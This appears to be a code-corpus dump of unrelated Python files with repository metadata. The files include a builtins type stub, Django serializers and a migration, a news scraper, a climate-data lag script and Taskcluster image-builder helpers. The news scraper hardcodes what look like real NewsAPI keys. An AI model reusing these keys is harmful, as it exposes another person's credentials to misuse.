@overload
def zip(
__iter1: Iterable[_T1], __iter2: Iterable[_T2], __iter3: Iterable[_T3], __iter4: Iterable[_T4], __iter5: Iterable[_T5]
) -> Iterator[Tuple[_T1, _T2, _T3, _T4, _T5]]: ...
@overload
def zip(
__iter1: Iterable[Any],
__iter2: Iterable[Any],
__iter3: Iterable[Any],
__iter4: Iterable[Any],
__iter5: Iterable[Any],
__iter6: Iterable[Any],
*iterables: Iterable[Any],
) -> Iterator[Tuple[Any, ...]]: ...
def __import__(
name: str,
globals: Optional[Mapping[str, Any]] = ...,
locals: Optional[Mapping[str, Any]] = ...,
fromlist: Sequence[str] = ...,
level: int = ...,
) -> Any: ...
# Actually the type of Ellipsis is <type 'ellipsis'>, but since it's
# not exposed anywhere under that name, we make it private here.
class ellipsis: ...
Ellipsis: ellipsis
class BaseException(object):
args: Tuple[Any, ...]
__cause__: Optional[BaseException]
__context__: Optional[BaseException]
__suppress_context__: bool
__traceback__: Optional[TracebackType]
def __init__(self, *args: object) -> None: ...
def __str__(self) -> str: ...
def __repr__(self) -> str: ...
def with_traceback(self: _TBE, tb: Optional[TracebackType]) -> _TBE: ...
class GeneratorExit(BaseException): ...
class KeyboardInterrupt(BaseException): ...
class SystemExit(BaseException):
code: int
class Exception(BaseException): ...
class StopIteration(Exception):
value: Any
_StandardError = Exception
class OSError(Exception):
errno: int
strerror: str
# filename, filename2 are actually Union[str, bytes, None]
filename: Any
filename2: Any
if sys.platform == "win32":
winerror: int
EnvironmentError = OSError
IOError = OSError
if sys.platform == "win32":
WindowsError = OSError
class ArithmeticError(_StandardError): ...
class AssertionError(_StandardError): ...
class AttributeError(_StandardError): ...
class BufferError(_StandardError): ...
class EOFError(_StandardError): ...
class ImportError(_StandardError):
def __init__(self, *args: object, name: Optional[str] = ..., path: Optional[str] = ...) -> None: ...
name: Optional[str]
path: Optional[str]
msg: str # undocumented
class LookupError(_StandardError): ...
class MemoryError(_StandardError): ...
class NameError(_StandardError): ...
class ReferenceError(_StandardError): ...
class RuntimeError(_StandardError): ...
class StopAsyncIteration(Exception):
value: Any
class SyntaxError(_StandardError):
msg: str
lineno: Optional[int]
offset: Optional[int]
text: Optional[str]
filename: Optional[str]
class SystemError(_StandardError): ...
class TypeError(_StandardError): ...
class ValueError(_StandardError): ...
class FloatingPointError(ArithmeticError): ...
class OverflowError(ArithmeticError): ...
class ZeroDivisionError(ArithmeticError): ...
class ModuleNotFoundError(ImportError): ...
class IndexError(LookupError): ...
class KeyError(LookupError): ...
class UnboundLocalError(NameError): ...
class BlockingIOError(OSError):
characters_written: int
class ChildProcessError(OSError): ...
class ConnectionError(OSError): ...
class BrokenPipeError(ConnectionError): ...
class ConnectionAbortedError(ConnectionError): ...
class ConnectionRefusedError(ConnectionError): ...
class ConnectionResetError(ConnectionError): ...
class FileExistsError(OSError): ...
class FileNotFoundError(OSError): ...
class InterruptedError(OSError): ...
class IsADirectoryError(OSError): ...
class NotADirectoryError(OSError): ...
class PermissionError(OSError): ...
class ProcessLookupError(OSError): ...
class TimeoutError(OSError): ...
class NotImplementedError(RuntimeError): ...
class RecursionError(RuntimeError): ...
class IndentationError(SyntaxError): ...
class TabError(IndentationError): ...
class UnicodeError(ValueError): ...
class UnicodeDecodeError(UnicodeError):
encoding: str
object: bytes
start: int
end: int
reason: str
def __init__(self, __encoding: str, __object: bytes, __start: int, __end: int, __reason: str) -> None: ...
class UnicodeEncodeError(UnicodeError):
encoding: str
object: str
start: int
end: int
reason: str
def __init__(self, __encoding: str, __object: str, __start: int, __end: int, __reason: str) -> None: ...
class UnicodeTranslateError(UnicodeError): ...
class Warning(Exception): ...
class UserWarning(Warning): ...
class DeprecationWarning(Warning): ...
class SyntaxWarning(Warning): ...
class RuntimeWarning(Warning): ...
class FutureWarning(Warning): ...
class PendingDeprecationWarning(Warning): ...
class ImportWarning(Warning): ...
class UnicodeWarning(Warning): ...
class BytesWarning(Warning): ...
class ResourceWarning(Warning): ...
|
[
"erictr@microsoft.com"
] |
erictr@microsoft.com
|
0dacb01c1f22a603da98647bc57c25c62fc8e595
|
c64ed5cd5f60f1ad5def09fcc39655519cb6f09e
|
/resources/map/items.py
|
5f592669b5ee831bd807ebf077a46bee49a7eeb7
|
[] |
no_license
|
moonblade/WebGame
|
33f0f45047282d7c44e6a4ed8b4a79589f285ee3
|
45761c6e6ca383f991eacb919a9ab105a96cebd1
|
refs/heads/master
| 2022-12-16T06:05:25.307195
| 2021-05-29T14:44:52
| 2021-05-29T14:44:52
| 156,554,764
| 0
| 0
| null | 2022-12-03T21:01:05
| 2018-11-07T14:00:32
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 331
|
py
|
#!/usr/bin/python
import os
outfile = 'items.png'
files = os.popen('ls ./items | sort -n').read()
files = ["items/" + x for x in files.split('\n') if len(x) > 0]
# files = [files.split('\n')[-1]] + files.split('\n')[:-1]
files = ' '.join(files)
# print(files)
command = 'convert ' + files + ' +append ' + outfile
os.system(command)
|
[
"moonblade168@gmail.com"
] |
moonblade168@gmail.com
|
e7e50b7844d4d1c49182d4a961b9980532ff96c3
|
d08c620cf5b9a2f3a55a45895bbd6586a020b74d
|
/foodcartapp/serializers.py
|
406ff0c23e81eb9b589cba585ae33500a6409474
|
[] |
no_license
|
TheEgid/starburger
|
a7b6d9c941852f135d466629e83d3f2ecfce1c96
|
9cfcb2a02fa7adb89c05c967933f4faa3bfb74e8
|
refs/heads/main
| 2023-07-07T18:00:54.962547
| 2021-08-14T08:27:48
| 2021-08-14T08:27:48
| 346,059,152
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 786
|
py
|
from phonenumber_field.serializerfields import PhoneNumberField
from rest_framework.serializers import ModelSerializer
from .models import Product, Order, OrderItem
class ProductSerializer(ModelSerializer):
class Meta:
model = Product
fields = ['id']
class OrderItemSerializer(ModelSerializer):
class Meta:
product = ProductSerializer(many=True)
model = OrderItem
fields = ['id', 'product', 'quantity', 'value']
class OrderSerializer(ModelSerializer):
products = OrderItemSerializer(many=True, write_only=True)
phonenumber = PhoneNumberField()
class Meta:
model = Order
write_only = ['products']
fields = ['id', 'firstname', 'lastname',
'products', 'address', 'phonenumber']
|
[
"egid.f1@gmail.com"
] |
egid.f1@gmail.com
|
c44fa50e6751f303019b95234a6cdbe51e7c54d4
|
c035076460b928695fcabd2fe5b286da45133a9c
|
/WordCount.py
|
6371398c39f8f4b8b57c7af99012f6bbb3bcf89a
|
[] |
no_license
|
ckimani/WordCount
|
2451500ee565fbf01b086e762db01f50088f5ba6
|
b979244251c94815bebec9bf0eb993bb92166557
|
refs/heads/master
| 2021-01-11T19:06:46.434958
| 2017-01-18T08:49:07
| 2017-01-18T08:49:07
| 79,319,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
def words(str):
#Function declaration that accepts a series of strings as an argument.
cnt = dict()
"""
Creating an empty dictionary data type, to hold the string
and the integer (The number of occurences as a pair).
"""
word = str.split()
#The split() function will take each string in the series as a separate entity.
#Analysis of each character in a string.
for char in word:
if char in cnt:
cnt[char] += 1
else:
cnt[char] = 1
return cnt
print( words('olly olly : ¿Qué in come free.'))
#Function call
|
[
"noreply@github.com"
] |
noreply@github.com
|
2c665d14bac78537c42bd9cb1e10069b7f4a285c
|
744bbf27f7e6f397e872a1a019d0c8eda46bf1e5
|
/subjects/migrations/0002_auto_20200728_0941.py
|
73128baef5afb2d787efd2b679f5434171cb5e9a
|
[] |
no_license
|
joesky-trojey/SchoolManagement
|
42d5d58dbabd58e0afbae77d922ea87d8c0ee3c6
|
46595fb52f9f4afcaacd042cfdf7903b08249011
|
refs/heads/master
| 2022-11-30T20:14:43.853513
| 2020-08-13T08:37:40
| 2020-08-13T08:37:40
| 287,223,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 677
|
py
|
# Generated by Django 3.0.8 on 2020-07-28 09:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('subjects', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='subject',
name='shorthand',
field=models.CharField(default=models.CharField(max_length=20, unique=True, verbose_name='Subject'), max_length=10, verbose_name="Subject's shorhand"),
),
migrations.AlterField(
model_name='subject',
name='optionality',
field=models.CharField(max_length=1, verbose_name='Optionality'),
),
]
|
[
"trojey@localhost.localdomain"
] |
trojey@localhost.localdomain
|
d0f805cd5b4c54300491e93aef4f4b816517393e
|
ea872f0a2bcc4270b7089120e3eb2f8dd32a165e
|
/Baxter/build/planning_baxter/catkin_generated/pkg.develspace.context.pc.py
|
e788f2c9fa75bd9400e0e1903a35e10d75c2678c
|
[] |
no_license
|
ZhenYaGuo/Warehouse-Robotic-System
|
2def137478911f499c45276aa3103a0b68ebb8d7
|
47b78d111b387102e29d2596bd5dc7c704f74f8f
|
refs/heads/master
| 2021-08-24T04:12:43.379580
| 2017-12-08T01:48:09
| 2017-12-08T01:48:09
| 113,405,332
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "planning_baxter"
PROJECT_SPACE_DIR = "/home/cc/ee106a/fa17/class/ee106a-aax/ros_workspaces/project/devel"
PROJECT_VERSION = "0.0.0"
|
[
"31947861+ZhenYaGuo@users.noreply.github.com"
] |
31947861+ZhenYaGuo@users.noreply.github.com
|
d5ac621f8b8dade846b1560e41d0dfdf6b8717fb
|
6833217da57c00bf446dce0d703e8076910ce24f
|
/Coding Tests/Citibank June 2021/digits.py
|
35a583659557fbd4277154e099bd7e4b355550f5
|
[] |
no_license
|
ashjune8/Python-Algorithm-Solutions
|
d301b903263d2787f5f25d182918ced1405cac73
|
04d8453d8ba54b6d7b8ca473d796308ae7f4f6b9
|
refs/heads/master
| 2022-03-01T05:26:22.212625
| 2022-02-19T01:23:53
| 2022-02-19T01:23:53
| 91,991,134
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
py
|
def solution(N):
# write your code in Python 3.6
stringConverted = str(N)
resultString = ''
if(len(stringConverted) == 1):
return 0
for i in range(len(stringConverted)):
if (i == 0):
resultString += '1'
else:
resultString += '0'
return int(resultString)
print solution(2)
|
[
"ashjune8@gmail.com"
] |
ashjune8@gmail.com
|
2a2b92ed730c26b01a26a8190e3a3db8eba1cd6e
|
c524baf320d12b456fa3b2c14127835df3cab567
|
/News_Feed_Generator/source_code/Files/scraping.py
|
524561349c0bf43d31396e5ba1f722cabac1ab0e
|
[] |
no_license
|
kapil123-git/News-Feed-Generator
|
3f7551bfa941bb08d5055c63b4c07931c0cb4797
|
883d68c068bc456c609d1de55e3eb8751102f68a
|
refs/heads/master
| 2023-03-14T22:06:14.762197
| 2021-03-30T17:45:15
| 2021-03-30T17:45:15
| 353,085,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,155
|
py
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
from datetime import datetime
from tqdm import tqdm, tqdm_notebook
from functools import reduce
import os
def getSources():
source_url = 'https://newsapi.org/v1/sources?language=en'
response = requests.get(source_url).json()
sources = dict()
for source in response['sources']:
dct=source['id']
sources[dct]=source['category']
return sources
def mapping():
d = {}
response = requests.get('https://newsapi.org/v1/sources?language=en')
response = response.json()
i=0
for s in response['sources']:
lst=[]
lst.append(s['category'])
lst.append(s['name'])
lst.append(s['description'])
d[i]=lst
i+=1
return d
def category(source, m):
try:
return m[source]
except:
return 'NC'
def getDailyNews():
yt=0
surc = getSources()
sources=[]
sources=surc.keys()
#key='38d7369eff324b219b8c24cf22b5f5b0'
key='55feabfcd61c4f3e916b9f7cf24ba048'
url = 'https://newsapi.org/v1/articles?source={0}&sortBy={1}&apiKey={2}'
responses = []
final=[]
bus=0
tec=0
spt=0
ent=0
sci=0
grl=0
ttl_lst=[]
for i, source in tqdm_notebook(enumerate(sources), total=len(sources)):
# if surc[source] =='business':
# key='6dbb708e222a459ebec065c3e2066f77'
# elif surc[source]=='technology':
# key='54e59984b5b24a2d842697cc7c90bbaa'
# elif surc[source]=='science':
# key='b4a1bbaa682341eb8b4abc517f2f8b18'
# elif surc[source]=='sports':
# key='909518b5f3d44f9682eb3a3a3da65b70'
# elif surc[source]=='entertainment':
# key='828126b9d5ce49c397f56a616c0d56a3'
# else:
# key='59f46ecf5a5b4eefae15db1398f4a587'
u = url.format(source, 'top', key)
v= url.format(source, 'latest', key)
response = requests.get(u)
r = response.json()
response = requests.get(v)
s=response.json()
# print(r,"\n\n")
flag=''
fname=''
files=open('123.txt','w')
if r['status']=="error":
return "Done"
try:
for article in r['articles']:
# print("ARTICLES IS:",article,"\n\n")
img=article['urlToImage']
ttl=article['title']
descp=article['description']
# print("title: ",ttl,"\n\ndescp: ",descp)
# print(bus)
# bus+=1
if (ttl is None) or (descp is None):
pass
else:
if ttl not in ttl_lst:
# print("title: ",ttl,"\n\ndescp: ",descp)
f=surc[source]
#print(f)
if f=="business":
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(bus)+".txt"
bus+=1
flag='b'
elif f=='technology':
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(tec)+".txt"
tec+=1
flag='t'
elif f=='sports':
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(spt)+".txt"
spt+=1
flag='sp'
elif f=='entertainment':
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(ent)+".txt"
ent+=1
flag='e'
elif f=='science':
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(sci)+".txt"
sci+=1
flag='sc'
else:
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(grl)+".txt"
grl+=1
flag='g'
files = open(fname,'w')
# print(fname)
# print("before")
art=img+'\n'+ttl+'\n'+descp
ttl_lst.append(ttl)
files.write(art)
files.close()
except Exception as e:
files.close()
# print(fname)
os.remove(fname)
if flag=='b':
bus-=1
elif flag=='t':
tec-=1
elif flag=='sp':
spt-=1
elif flag=='e':
ent-=1
elif flag=='g':
grl-=1
else:
sci-=1
# print(e)
# articles = list(map(lambda r: r['articles'], responses))
# articles = list(reduce(lambda x,y: x+y, articles))
# news = pd.DataFrame(articles)
# news = news.dropna()
# news = news.drop_duplicates()
# news.reset_index(inplace=True, drop=True)
# jink = mapping()
# print(news)
# news['category'] = news['source'].map(lambda s: category(s, d))
# news['scraping_date'] = datetime.now()
# i=2
# print("news")
# jink=dict()
# for u,v in d.items():
# jink[u]=v
# print(jink)
# try:
# aux = pd.read_excel('news.xlsx')
# aux = aux.append(news)
# print("hello..")
# print(aux)
# aux = aux.drop_duplicates('url')
# aux.reset_index(inplace=True, drop=True)
# aux.to_excel('news.xlsx', encoding='utf-8', index=False)
# except:
# news.to_excel('news.xlsx', index=False, encoding='utf-8')
print('Done')
if __name__=='__main__':
getDailyNews()
|
[
"kapilsharmag99@gmail.com"
] |
kapilsharmag99@gmail.com
|
426610fdd1399339d2e3a2442398b51ab5209027
|
c5146f60c3a865050433229ba15c5339c59a9b68
|
/zhaquirks/plaid/__init__.py
|
203efe3bfb31a25162bfb3a165e8d609307592a0
|
[
"Apache-2.0"
] |
permissive
|
Shulyaka/zha-device-handlers
|
331505618a63691a86b83977b43508b0e3142af2
|
84d02be7abde55a6cee80fa155f0cbbc20347c40
|
refs/heads/dev
| 2023-02-22T10:17:09.000060
| 2023-02-04T15:57:17
| 2023-02-04T15:57:17
| 194,286,710
| 1
| 0
|
Apache-2.0
| 2023-02-04T22:59:20
| 2019-06-28T14:25:54
|
Python
|
UTF-8
|
Python
| false
| false
| 72
|
py
|
"""Quirks for Plaid Systems devices."""
PLAID_SYSTEMS = "PLAID SYSTEMS"
|
[
"noreply@github.com"
] |
noreply@github.com
|
77dd188e69c5ed676818bbd7f52b5ac79d253aa4
|
22a366e66890009e225b676ff9415c7cc6d26300
|
/python/src/jobanalysis/skill/process_skills.py
|
5e74ed1866906762b30add6cbc0e961c4fa4269b
|
[] |
no_license
|
smaity8136/jobaly
|
2d0c1cecac09902563ffd1891acee987e2e307f5
|
1788a95877aaf60471db775a3a88a20719ffc586
|
refs/heads/master
| 2022-04-15T03:57:43.770738
| 2015-04-16T22:42:31
| 2015-04-16T22:42:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 637
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 21 16:57:48 2014
@author: dlmu__000
"""
import json
import nltk
def loadFile(fileName):
f = open(fileName, "r")
data = f.read()
sents = json.loads(data)
for sent in sents:
sent[1] = nltk.word_tokenize(sent[1])
print sent[1]
return sents
def rule1(sents):
ignoreList = [u'-', u',',u'.',u'or',u'and' ]
pass
def testRule1():
sent = "HTML5, CSS, JavaScript, Sencha ExtJS, JQuery Mobile, and REST."
tokens = nltk.word_tokenize(sent)
print tokens
def main():
testRule1()
if __name__ == "__main__":
main()
|
[
"pkushiqiang@gmail.com"
] |
pkushiqiang@gmail.com
|
3726da4b6e8c640f2c1e4980ff8758f66e31bb14
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/lag82/504-tideGauge.py
|
f6cdd6a41e7cde5295cbc1bf322d1a52927b4360
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,984
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 504
y = 505
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
# #check if the file exists
# os.chdir(dir_out)
# if (os.path.isfile(tg_name)):
# print('file already exists')
# continue
#cd to where the actual file is
os.chdir(dir_in)
pred = pd.read_csv(tg_name)
pred.sort_values(by = 'date', inplace=True)
pred.reset_index(inplace = True)
pred.drop('index', axis = 1, inplace = True)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since ERA20C has 3hrly data
#the lag_hrs is increased from 6(eraint) to 11 (era20C)
time_lagged = pd.DataFrame()
lag_hrs = [0, 6, 12, 18, 24, 30]
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
#datafrmae that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
#merge the selected tlagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
dc6915253df8e0d8731f11cc979a0b8130edcaf3
|
ef5ecb62af83623b071b81b8d68eaac7fcce80cc
|
/beginner/question_1118.py
|
5f3f8d08cc8bc43d4bf3a6dfaeb71c2bae72825d
|
[] |
no_license
|
LuizHenrique1999/uri_online_judge
|
0e6d5f48c4ffd58902164ea9decf377b9df46283
|
937527ef0ebdff9756ab22bd95dbc03218a25144
|
refs/heads/main
| 2023-04-01T21:10:24.629839
| 2021-03-30T21:34:23
| 2021-03-30T21:34:23
| 352,787,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 694
|
py
|
def novo_calculo():
while True:
print('novo calculo (1-sim 2-nao)')
novo_calc = float(input())
if novo_calc == 1:
repete_operacao()
elif novo_calc == 2:
exit()
elif novo_calc != 1 and novo_calc != 2:
continue
def repete_operacao():
lista_repete = []
while True:
n = float(input())
if n >= 0 and n < 10.01:
lista_repete.append(n)
else:
print('nota invalida')
if len(lista_repete) == 2:
res = (lista_repete[0] + lista_repete[1]) / 2
print('media = %.2f' % res)
break
repete_operacao()
novo_calculo()
|
[
"luizdesenv01@outlook.com"
] |
luizdesenv01@outlook.com
|
a2769b3ae31b35c5712c041a8a7d129ddd2971da
|
ef67ea9b7f450a4317553882a28205194dcd5a86
|
/ci/cib.py
|
80d7ee0ca2c404968a3a8db1a091a88d4a81bdf1
|
[] |
no_license
|
tp-tc/cloud-image-builder
|
a19c62a24a22fe140a58f3f50d5e734163c6cc26
|
430465adc63f5a0a7f0eda2f6e8f73949c08b34e
|
refs/heads/master
| 2022-12-01T17:45:41.404866
| 2020-05-07T21:32:19
| 2020-05-07T21:32:19
| 262,164,488
| 0
| 0
| null | 2020-05-07T21:41:35
| 2020-05-07T21:41:35
| null |
UTF-8
|
Python
| false
| false
| 11,383
|
py
|
import gzip
import json
import os
import urllib.request
import yaml
from datetime import datetime, timedelta
from cachetools import cached, TTLCache
cache = TTLCache(maxsize=100, ttl=300)
@cached(cache)
def getConfig(revision, key):
url = 'https://raw.githubusercontent.com/mozilla-platform-ops/cloud-image-builder/{}/config/{}.yaml'.format(revision, key)
return yaml.safe_load(urllib.request.urlopen(url).read().decode())
def updateRole(auth, configPath, roleId):
with open(configPath, 'r') as stream:
payload = yaml.safe_load(stream)
role = None
try:
role = auth.role(roleId = roleId)
except:
print('TASKCLUSTER_ROOT_URL:', os.environ['TASKCLUSTER_ROOT_URL'])
print('error:', sys.exc_info()[0])
if role:
print('info: role {} existence detected'.format(roleId))
auth.updateRole(roleId, payload)
print('info: role {} updated'.format(roleId))
else:
print('info: role {} absence detected'.format(roleId))
auth.createRole(roleId, payload)
print('info: role {} created'.format(roleId))
def updateWorkerPool(workerManager, configPath, workerPoolId):
with open(configPath, 'r') as stream:
payload = yaml.safe_load(stream)
try:
workerManager.workerPool(workerPoolId = workerPoolId)
print('info: worker pool {} existence detected'.format(workerPoolId))
workerManager.updateWorkerPool(workerPoolId, payload)
print('info: worker pool {} updated'.format(workerPoolId))
except:
print('info: worker pool {} absence detected'.format(workerPoolId))
workerManager.createWorkerPool(workerPoolId, payload)
print('info: worker pool {} created'.format(workerPoolId))
def createTask(queue, taskId, taskName, taskDescription, provisioner, workerType, commands, env = None, image = None, priority = 'low', retries = 0, retriggerOnExitCodes = [], dependencies = [], maxRunMinutes = 10, features = {}, artifacts = [], osGroups = [], routes = [], scopes = [], taskGroupId = None):
payload = {
'created': '{}Z'.format(datetime.utcnow().isoformat()[:-3]),
'deadline': '{}Z'.format((datetime.utcnow() + timedelta(days = 3)).isoformat()[:-3]),
'dependencies': dependencies,
'provisionerId': provisioner,
'workerType': workerType,
'priority': priority,
'routes': routes,
'scopes': scopes,
'payload': {
'maxRunTime': (maxRunMinutes * 60),
'command': commands,
'artifacts': artifacts if workerType.startswith('win') else { artifact['name']: { 'type': artifact['type'], 'path': artifact['path'] } for artifact in artifacts },
'features': features
},
'metadata': {
'name': taskName,
'description': taskDescription,
'owner': 'grenade@mozilla.com',
'source': 'https://github.com/mozilla-platform-ops/cloud-image-builder'
},
'schedulerId': 'taskcluster-github'
}
if taskGroupId is not None:
payload['taskGroupId'] = taskGroupId
if env is not None:
payload['payload']['env'] = env
if image is not None:
payload['payload']['image'] = image
if osGroups:
payload['payload']['osGroups'] = osGroups
if retriggerOnExitCodes and retries > 0:
payload['retries'] = retries
payload['payload']['onExitStatus'] = {
'retry': retriggerOnExitCodes
}
queue.createTask(taskId, payload)
print('info: task {} ({}: {}), created with priority: {}'.format(taskId, taskName, taskDescription, priority))
def diskImageManifestHasChanged(platform, key, currentRevision):
try:
previousRevisionUrl = '{}/api/index/v1/task/project.relops.cloud-image-builder.{}.{}.latest/artifacts/public/image-bucket-resource.json'.format(os.environ['TASKCLUSTER_ROOT_URL'], platform, key)
previousRevision = json.loads(gzip.decompress(urllib.request.urlopen(previousRevisionUrl).read()).decode('utf-8-sig'))['build']['revision']
print('debug: previous revision determined as: {}, using: {}'.format(previousRevision, previousRevisionUrl))
currentConfig = getConfig(currentRevision, key)
print('debug: current config for: {}, loaded from revision: {}'.format(key, currentRevision[0:7]))
previousConfig = getConfig(previousRevision, key)
print('debug: previous config for: {}, loaded from revision: {}'.format(key, previousRevision[0:7]))
except:
print('error: failed to load comparable disk image configs for: {}'.format(key))
return True
imageConfigUnchanged = True
isoConfigUnchanged = True
sharedFilesUnchanged = True
if currentConfig['image'] == previousConfig['image']:
print('info: no change detected for image definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(key, previousRevision[0:7], currentRevision[0:7]))
else:
imageConfigUnchanged = False
print('info: change detected for image definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(key, previousRevision[0:7], currentRevision[0:7]))
if currentConfig['iso'] == previousConfig['iso']:
print('info: no change detected for iso definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(key, previousRevision[0:7], currentRevision[0:7]))
else:
isoConfigUnchanged = False
print('info: change detected for iso definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(key, previousRevision[0:7], currentRevision[0:7]))
# todo: parse shared config files for change specific to platform/key
for sharedFile in ['disable-windows-service', 'drivers', 'packages', 'unattend-commands']:
currentContents = urllib.request.urlopen('https://raw.githubusercontent.com/mozilla-platform-ops/cloud-image-builder/{}/config/{}.yaml'.format(currentRevision, sharedFile)).read().decode()
previousContents = urllib.request.urlopen('https://raw.githubusercontent.com/mozilla-platform-ops/cloud-image-builder/{}/config/{}.yaml'.format(previousRevision, sharedFile)).read().decode()
if currentContents == previousContents:
print('info: no change detected in {}.yaml between last image build in revision: {} and current revision: {}'.format(sharedFile, previousRevision[0:7], currentRevision[0:7]))
else:
sharedFilesUnchanged = False
print('info: change detected for {}.yaml between last image build in revision: {} and current revision: {}'.format(sharedFile, previousRevision[0:7], currentRevision[0:7]))
return not (imageConfigUnchanged and isoConfigUnchanged and sharedFilesUnchanged)
def machineImageManifestHasChanged(platform, key, currentRevision, group):
try:
previousRevisionUrl = '{}/api/index/v1/task/project.relops.cloud-image-builder.{}.{}.latest/artifacts/public/image-bucket-resource.json'.format(os.environ['TASKCLUSTER_ROOT_URL'], platform, key)
previousRevision = json.loads(gzip.decompress(urllib.request.urlopen(previousRevisionUrl).read()).decode('utf-8-sig'))['build']['revision']
print('debug: previous revision determined as: {}, using: {}'.format(previousRevision, previousRevisionUrl))
currentConfig = getConfig(currentRevision, key)
print('debug: current config for: {}, loaded from revision: {}'.format(key, currentRevision[0:7]))
previousConfig = getConfig(previousRevision, key)
print('debug: previous config for: {}, loaded from revision: {}'.format(key, previousRevision[0:7]))
except:
print('error: failed to load comparable disk image configs for: {}'.format(key))
return True
targetBootstrapUnchanged = True
targetTagsUnchanged = True
currentTargetGroupConfig = next((t for t in currentConfig['target'] if t['group'] == group), None)
previousTargetGroupConfig = next((t for t in previousConfig['target'] if t['group'] == group), None)
if previousTargetGroupConfig is None and currentTargetGroupConfig is not None:
print('info: new target group {} detected, in {}.yaml since last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
return True
if 'bootstrap' in currentTargetGroupConfig and 'bootstrap' not in previousTargetGroupConfig:
targetBootstrapUnchanged = False
print('info: change detected in target group {}. new bootstrap execution commands definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
elif 'bootstrap' not in currentTargetGroupConfig and 'bootstrap' in previousTargetGroupConfig:
targetBootstrapUnchanged = False
print('info: change detected in target group {}. removed bootstrap execution commands definition in {}.yaml between last image build in revision: {} and current revision: {}'.format(group, key, previousRevision[0:7], currentRevision[0:7]))
elif 'bootstrap' in currentTargetGroupConfig and 'bootstrap' in previousTargetGroupConfig and currentTargetGroupConfig['bootstrap'] != previousTargetGroupConfig['bootstrap']:
targetBootstrapUnchanged = False
